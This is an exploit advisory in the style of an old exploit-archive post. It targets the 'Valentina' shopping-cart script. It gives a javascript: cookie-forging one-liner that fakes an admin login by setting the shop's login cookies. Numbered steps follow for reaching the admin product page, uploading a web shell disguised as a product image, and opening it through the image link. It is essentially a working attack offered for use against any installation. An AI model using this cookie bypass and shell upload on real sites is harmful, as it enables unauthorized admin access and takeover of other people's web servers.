< ------------------- header data start ------------------- >
#############################################################

# Application Name : Valentina

# Vulnerable Type : Cookie Handling Vulnerebility

# Infection : SQL Info GET...

# author : Septemb0x

# Script Down.& WebSite : http://s2.dosya.tc/valentina.zip.html - http://www.valya.ru

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

EXPLOIT :
javascript:document.cookie = nvshoplogin=; path=/;; document.cookie = nvshoplogined=true; path=/;; document.cookie = nvshoppassword=; path=/;;

1. Cookie Changed,
2. Go To http://target/path/admin/goods.php
3. Add Product And Add �mage(Shell) Upload.
4. Go to Add Product Page > Product Image Right Click > Features > *SHELL LINK* ;)

< -- bug code end of -- >